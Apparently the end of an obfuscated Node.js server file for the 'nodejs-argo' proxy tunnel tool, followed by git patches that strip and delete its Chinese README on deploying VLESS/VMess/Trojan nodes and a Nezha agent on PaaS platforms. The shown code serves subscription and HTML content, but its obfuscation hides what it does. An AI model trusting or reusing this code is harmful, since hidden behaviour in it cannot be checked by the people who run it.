_0x2e9c58={};_0x2e9c58[_0x51f3d1(_0xb4aad9._0x1f2008,_0xb4aad9._0x86b813,_0xb4aad9._0x1f08a9,_0xb4aad9._0x99a61c)]=_0x4a2d87[_0x51f3d1(_0xb4aad9._0x13a682,_0xb4aad9._0x60e80,0x3e9,_0xb4aad9._0x22f9bb)],_0x2ace7e[_0x4a289e(_0xb4aad9._0x50e7db,_0xb4aad9._0x102c89,_0xb4aad9._0x408a71,_0xb4aad9._0x1e943c)](-0x3bf+-0x810+0xdc6,_0x2e9c58),_0x31a6dd['end'](_0x51f3d1(0x44e,0x24e,_0xb4aad9._0x35c6c3,_0xb4aad9._0x50b575));}else{const _0x432d78={};_0x432d78['Content-Type']=_0x4a2d87['bBlKr'],_0x22bac6['writeHead'](0x1559+0x1150*-0x2+0xe0f,_0x432d78),_0x22bac6['end'](subContent);}}else{if(_0x4a2d87[_0x51f3d1(_0xb4aad9._0x5e33ac,_0xb4aad9._0x38d173,_0xb4aad9._0x149392,_0xb4aad9._0x7a5541)](_0x4a2d87[_0x4a289e(_0xb4aad9._0x38721a,0x374,0x3f2,_0xb4aad9._0x59b088)],_0x4a2d87[_0x4a289e(_0xb4aad9._0x245a0d,0x3f5,_0xb4aad9._0x4ae57a,_0xb4aad9._0x340059)]))try{const _0x345374=fs['readFileSync'](subPath,_0x4a2d87[_0x51f3d1(_0xb4aad9._0x1d8397,_0xb4aad9._0x307282,_0xb4aad9._0x53d799,_0xb4aad9._0x100ae7)]),_0x34b176={};_0x34b176[_0x51f3d1(_0xb4aad9._0x5d2b38,_0xb4aad9._0x377e71,_0xb4aad9._0x377fb5,0x306)]='text/plain;\x20charset=utf-8',_0x22bac6['writeHead'](-0x13d8+-0x33*-0x7e+0x47a*-0x1,_0x34b176),_0x22bac6[_0x51f3d1(_0xb4aad9._0x586192,0x39e,0x302,0x368)](_0x345374);}catch(_0x285455){if(_0x4a2d87['SWaEF'](_0x4a2d87[_0x4a289e(_0xb4aad9._0x17ad1f,_0xb4aad9._0x17ad1f,_0xb4aad9._0xfdf278,0x412)],_0x4a2d87[_0x51f3d1(_0xb4aad9._0x47073e,_0xb4aad9._0x42a8d3,_0xb4aad9._0x30a975,0x2a8)])){const _0xc384da={};_0xc384da[_0x51f3d1(0x334,_0xb4aad9._0x1be305,0x309,0x2f7)]='text/plain;\x20charset=utf-8',_0x22bac6[_0x4a289e(0x588,_0xb4aad9._0x1e3709,_0xb4aad9._0x3e5d06,_0xb4aad9._0x5ef6ee)](0x9*-0x1cf+-0x19d*-0xc+0xd*-0x16,_0xc384da),_0x22bac6['end'](_0x4a2d87[_0x51f3d1(_0xb4aad9._0x4d18e4,_0xb4aad9._0x4ebab4,_0xb4aad9._0x3fbe7b,_0xb4aad9._0x3d0fae)]);}else{if(_0x4a2d87['CRiqp'](_0xd1b044['response'][_0x4a289e(_0xb4aad9._0x32260d,_0xb4aad9._0x22a1c4,0x48c,_0xb4aad9._0x3cddf1)],-0x1582+-0x1cf1+0x3403)){}}}else{_0x2508b8[_0x51f3d1(_0xb4aad9._0x1d21af,_0xb4aad9._0x1be305,_0xb4aad9._0x586192,_0xb4aad9._0x307282)](_0x51f3d1(_0xb4aad9._0x13a186,_0xb4aad9._0x3355f8,0x409,_0xb4aad9._0x308a53));return;}}return;}}if(_0x4a2d87[_0x51f3d1(_0xb4aad9._0x427ca9,_0xb4aad9._0xfe202e,_0xb4aad9._0x117c19,_0xb4aad9._0x5eeccb)](_0x425956,'/')){if(_0x4a2d87[_0x4a289e(_0xb4aad9._0x48c30b,_0xb4aad9._0x1e1c9b,_0xb4aad9._0x181b1e,_0xb4aad9._0xfe202e)](_0x4a289e(_0xb4aad9._0x53888f,_0xb4aad9._0x4c2b77,_0xb4aad9._0x312200,0x6ca),_0x4a2d87[_0x4a289e(0x53b,_0xb4aad9._0x250764,_0xb4aad9._0x1197c3,_0xb4aad9._0x308c0c)])){try{const _0x15ee31=path['join'](__dirname,_0x4a2d87['WvIlq']),_0x47102b=await fs['promises'][_0x4a289e(0x49e,_0xb4aad9._0x480ad6,_0xb4aad9._0x467302,_0xb4aad9._0x5dcb6e)](_0x15ee31,_0x4a2d87['oaNzn']),_0x5be29e={};_0x5be29e[_0x4a289e(_0xb4aad9._0x4397c7,0x57c,0x4b7,0x406)]='text/html;\x20charset=utf-8',_0x22bac6[_0x4a289e(0x588,0x4f3,0x4a7,_0xb4aad9._0x2dd211)](0x3*0x6a0+0x3a5+-0x16bd*0x1,_0x5be29e),_0x22bac6[_0x4a289e(_0xb4aad9._0x9487af,_0xb4aad9._0x11385c,0x40f,_0xb4aad9._0x23c361)](_0x47102b);}catch(_0x42c1f1){const _0x25a38e={};_0x25a38e[_0x51f3d1(0x291,0x2fa,_0xb4aad9._0x1f08a9,0x262)]=_0x4a2d87[_0x4a289e(_0xb4aad9._0x1c568e,_0xb4aad9._0x163923,_0xb4aad9._0x4257b9,0x3c3)],_0x22bac6[_0x4a289e(_0xb4aad9._0x50e7db,0x4f5,_0xb4aad9._0x13f5e6,_0xb4aad9._0x181b1e)](0x1d9f*0x1+0x165*-0x16+0x1d7,_0x25a38e),_0x22bac6[_0x4a289e(_0xb4aad9._0x4c461f,_0xb4aad9._0x2d9f27,_0xb4aad9._0x3350c3,_0xb4aad9._0x427ca9)](_0x4a2d87[_0x51f3d1(_0xb4aad9._0x1c0445,0x21e,_0xb4aad9._0x2c7be8,_0xb4aad9._0x62e1dd)]);}return;}else{const _0x14062d=_0x56fbc2['constructor'][_0x4a289e(0x571,_0xb4aad9._0x114f8c,_0xb4aad9._0x1551f4,_0xb4aad9._0x1ec24d)]['bind'](_0x25c2fe),_0x4c5a1e=_0x5bc6ee[_0x2a2618],_0x1f5318=_0x46f54a[_0x4c5a1e]||_0x14062d;_0x14062d[_0x51f3d1(_0xb4aad9._0x232072,_0xb4aad9._0x4f57d7,0x337,0x23d)]=_0x47bcea[_0x4a289e(0x538,_0xb4aad9._0x31182e,_0xb4aad9._0x1b3b40,_0xb4aad9._0xe6e749)](_0x2d2d2c),_0x14062d['toString']=_0x1f5318['toString'][_0x51f3d1(_0xb4aad9._0x392fa7,_0xb4aad9._0x5eeccb,_0xb4aad9._0x161bd7,_0xb4aad9._0x541be0)](_0x1f5318),_0x1a1346[_0x4c5a1e]=_0x14062d;}}const _0x1b2fcf={};function _0x51f3d1(_0x5a5cf6,_0x4221e0,_0x34f6da,_0x3b9d0d){return _0x477c8c(_0x5a5cf6-_0x8fee39._0x21b7a2,_0x4221e0-_0x8fee39._0x22fd0f,_0x5a5cf6,_0x34f6da- -0x31);}_0x1b2fcf['Content-Type']=_0x4a2d87['bBlKr'],_0x22bac6[_0x51f3d1(0x45d,0x378,_0xb4aad9._0x3e796f,0x377)](0x305*-0x5+-0x1*-0x7ea+0x8c3*0x1,_0x1b2fcf);function _0x4a289e(_0x4142c3,_0x1bcda0,_0x3b644b,_0x5e5771){return _0x5d6c89(_0x4142c3-_0x161557._0x219b4a,_0x1bcda0-_0x161557._0x87e617,_0x3b644b-_0x161557._0x3701f6,_0x5e5771);}_0x22bac6[_0x51f3d1(_0xb4aad9._0x280fed,0x336,_0xb4aad9._0x1dd63d,_0xb4aad9._0x32bf99)](_0x4a289e(0x57f,_0xb4aad9._0x153dda,_0xb4aad9._0x327718,_0xb4aad9._0xd4ca60));});server[_0x5d6c89(0x12b,0x98,0x1e0,0x220)](PORT,()=>console['log'](_0x5d6c89(0x36,0xbe,-0x37,0x91)+PORT+'!')); From 7590564c9274ddea78f814ea39f4ea2aa0b72773 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:47:50 +0800 Subject: [PATCH 17/19] Update README.md --- README.md | 202 ------------------------------------------------------ 1 file changed, 202 deletions(-) diff --git a/README.md b/README.md index 866cc04531..8b13789179 100644 --- a/README.md +++ b/README.md @@ -1,203 +1 @@ -
-

- - nodejs-argo隧道代理 -

- nodejs-argo是一个强大的Argo隧道部署工具,专为PaaS平台和游戏玩具平台设计。它支持多种代理协议(VLESS、VMess、Trojan等),并集成了哪吒探针功能。 ---- - -Telegram交流反馈群组:https://t.me/eooceu -
- -## 郑重声明 -* 本项目自2025年10月29日15时45分起,已更改开源协议,并包含以下特定要求 -* 此项目仅限个人使用,禁止用于商业行为(包括但不限于:youtube,bilibili,tiktok,facebook..等等) -* 禁止新建项目将代码复制到自己仓库中用做商业行为 -* 请遵守当地法律法规,禁止滥用做公共代理行为 -* 如有违反以上条款者将追究法律责任 - -## 说明 (部署前请仔细阅读) - -* 本项目是针对node环境的paas平台和游戏玩具而生,采用Argo隧道部署节点,集成哪吒探针v0或v1可选。 -* node玩具平台只需上传index.js和package.json即可,paas平台需要docker部署的才上传Dockerfile。 -* 不填写ARGO_DOMAIN和ARGO_AUTH两个变量即启用临时隧道,反之则使用固定隧道。 -* 哪吒v0/v1可选,当哪吒端口为{443,8443,2096,2087,2083,2053}其中之一时,自动开启tls。 - -## 📋 环境变量 - -| 变量名 | 是否必须 | 默认值 | 说明 | -|--------|----------|--------|------| -| UPLOAD_URL | 否 | - | 订阅上传地址 | -| PROJECT_URL | 否 | https://www.google.com | 项目分配的域名 | -| AUTO_ACCESS | 否 | false | 是否开启自动访问保活 | -| PORT | 否 | 3000 | HTTP服务监听端口 | -| ARGO_PORT | 否 | 8001 | Argo隧道端口 | -| UUID | 否 | 89c13786-25aa-4520-b2e7-12cd60fb5202 | 用户UUID | -| NEZHA_SERVER | 否 | - | 哪吒面板域名 | -| NEZHA_PORT | 否 | - | 哪吒端口 | -| NEZHA_KEY | 否 | - | 哪吒密钥 | -| ARGO_DOMAIN | 否 | - | Argo固定隧道域名 | -| ARGO_AUTH | 否 | - | Argo固定隧道密钥 | -| CFIP | 否 | www.visa.com.tw | 节点优选域名或IP | -| CFPORT | 否 | 443 | 节点端口 | -| NAME | 否 | Vls | 节点名称前缀 | -| FILE_PATH | 否 | ./tmp | 运行目录 | -| SUB_PATH | 否 | sub | 订阅路径 | - -## 🌐 订阅地址 - -- 标准端口:`https://your-domain.com/sub` -- 非标端口:`http://your-domain.com:port/sub` - ---- - -## 🚀 进阶使用 - -### 安装 - -```bash -# 全局安装(推荐) -npm install -g nodejs-argo - -# 或者使用yarn -yarn global add nodejs-argo - -# 或者使用pnpm -pnpm add -g nodejs-argo -``` - -### 基本使用 - -```bash -# 直接运行(使用默认配置) -nodejs-argo - -# 使用npx运行 -npx nodejs-argo - -# 设置环境变量运行 - PORT=3000 npx nodejs-argo -``` - -### 环境变量配置 - -可使用 `.env` 文件来配置环境变量运行 - - -或者直接在命令行中设置: - -```bash -export UPLOAD_URL="https://your-merge-sub-domain.com" -export PROJECT_URL="https://your-project-domain.com" -export PORT=3000 -export UUID="your-uuid-here" -export NEZHA_SERVER="nz.your-domain.com:8008" -export NEZHA_KEY="your-nezha-key" -``` - -## 📦 作为npm模块使用 - -```javascript -// CommonJS -const nodejsArgo = require('nodejs-argo'); - -// ES6 Modules -import nodejsArgo from 'nodejs-argo'; - -// 启动服务 -nodejsArgo.start(); -``` - -## 🔧 后台运行 - -### 使用screen(推荐) -```bash -# 创建screen会话 -screen -S argo - -# 运行应用 -nodejs-argo - -# 按 Ctrl+A 然后按 D 分离会话 -# 重新连接:screen -r argo -``` - -### 使用tmux -```bash -# 创建tmux会话 -tmux new-session -d -s argo - -# 运行应用 -tmux send-keys -t argo "nodejs-argo" Enter - -# 分离会话:tmux detach -s argo -# 重新连接:tmux attach -t argo -``` - -### 使用PM2 -```bash -# 安装PM2 -npm install -g pm2 - -# 启动应用 -pm2 start nodejs-argo --name "argo-service" - -# 管理应用 -pm2 status -pm2 logs argo-service -pm2 restart argo-service -``` - -### 使用systemd(Linux系统服务) -```bash -# 创建服务文件 -sudo nano /etc/systemd/system/nodejs-argo.service - -``` -[Unit] -Description=Node.js Argo Service -After=network.target - -[Service] -Type=simple -User=root -WorkingDirectory=/root/test -Environment=ARGO_PORT=8080 -Environment=PORT=3000 -ExecStart=/usr/bin/npx nodejs-argo -Restart=always -RestartSec=10 - -[Install] -WantedBy=multi-user.target -``` - -# 启动服务 -sudo systemctl start nodejs-argo -sudo systemctl enable nodejs-argo -``` - -## 🔄 更新 - -```bash -# 更新全局安装的包 -npm update -g nodejs-argo - -# 或者重新安装 -npm uninstall -g nodejs-argo -npm install -g nodejs-argo -``` - -## 📚 更多信息 - -- [GitHub仓库](https://github.com/eooce/nodejs-argo) -- [npm包页面](https://www.npmjs.com/package/nodejs-argo) -- [问题反馈](https://github.com/eooce/nodejs-argo/issues) - ---- - -## 赞助 -* 感谢[VPS.Town](https://vps.town)提供赞助 https://vps.town - -* 感谢[ZMTO](https://zmto.com/?affid=1548)提供赞助优质双isp vps。 From cb31feb1d38d1d9ce3e4ec595d1472fce3bacae1 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:48:24 +0800 Subject: [PATCH 18/19] Delete .github\workflows\1.md --- ".github\\workflows\\1.md" | 1 - 1 file changed, 1 deletion(-) delete mode 100644 ".github\\workflows\\1.md" diff --git "a/.github\\workflows\\1.md" "b/.github\\workflows\\1.md" deleted file mode 100644 index b4de394767..0000000000 --- "a/.github\\workflows\\1.md" +++ /dev/null @@ -1 +0,0 @@ -11 From 2f007fbf85cf916d1068ac3e110066946c105126 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:48:35 +0800 Subject: [PATCH 19/19] Delete README.md --- README.md | 1 - 1 file changed, 1 deletion(-) delete mode 100644 README.md diff --git a/README.md b/README.md deleted file mode 100644 index 8b13789179..0000000000 --- a/README.md +++ /dev/null @@ -1 +0,0 @@ -